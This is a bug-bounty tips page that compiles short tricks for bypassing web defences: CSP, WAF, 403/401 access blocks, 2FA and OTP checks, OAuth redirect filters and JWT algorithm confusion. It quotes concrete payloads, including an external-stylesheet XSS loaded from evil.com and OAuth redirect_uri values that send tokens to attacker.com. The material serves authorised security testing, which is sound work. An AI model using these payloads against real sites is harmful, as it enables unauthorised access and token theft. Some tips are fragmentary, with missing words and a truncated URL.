Book of BugBounty Tips

Powered by GitBook

On this page

Bypasses

PreviousApplication Logic Bypasses NextMobile

Last updated 1 month ago

CSP Bypass, script-src 'self' data: -
.

Cloudfront Bypass -

403 Bypass:

Tool -

Price Manipulation -

OTP bypass -

Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if is claimed.

CSP -

I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.

https://twitter.com/HackerHumble

sometimes you find those PATHs that forwards to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)

https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/

https://github.com/lobuhi/byp4xx

ttps://github.com/Raywando/4xxbypass

https://github.com/sting8k/BurpSuite_403Bypasser

if “origin” header not work, try with “x-[org name]-origin”, same think for all headers!! e.g x-uber-origin, x-uber-host,..etc

#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...

Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.

What worked was... \udfff -> � -> ?

Therefore... {"redirectUri":"https://attacker\udfff@[victim]/"}

Equals... Location: https://attacker?@[victim]/

JWT Token Bypasses #2:

Capture the JWT token.

If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)

Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bu

{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK

POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}

GET /api_v1/messages?user_id=VICTIM_ID --> 401

GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK

How to find authentication bypass vulnerabilities. Focus. I Added headers.

Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized

Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found

So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' an call it from external "<svg><link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec

CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).

But I can raise it again to P3 (Iframe Injection) and Triaged.

<iframe src= blocked by CSP

<iframe srcdoc=

Auth bypass tip:

/api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true

/api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact:[ + ] PII Info disclosure [ + ] Sensitive info leak [ + ] Access admin endpoint #bugbantytips #bugbountytips

1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips

It's possible to bypass #CSP with the following : #JSONP: <script src="https://trustedsite/jsonp?callback=payload"> #AngularJS <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>

Encountered with AWS WAF? Just add "<!" (without quotes) before your payload and bypass that WAF. :) eg: <!alert(1) #BugBounty #bugbountytip #bugbountytips

If the target is using @Cloudflare , dig in their DNS records and search for the origins IP address. If you attack the application directly by his IP’s cloudflare WAF will not be there.

Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.

Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip

Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty

When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.

https://twitter.com/404death/status/1191222237782659072

Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter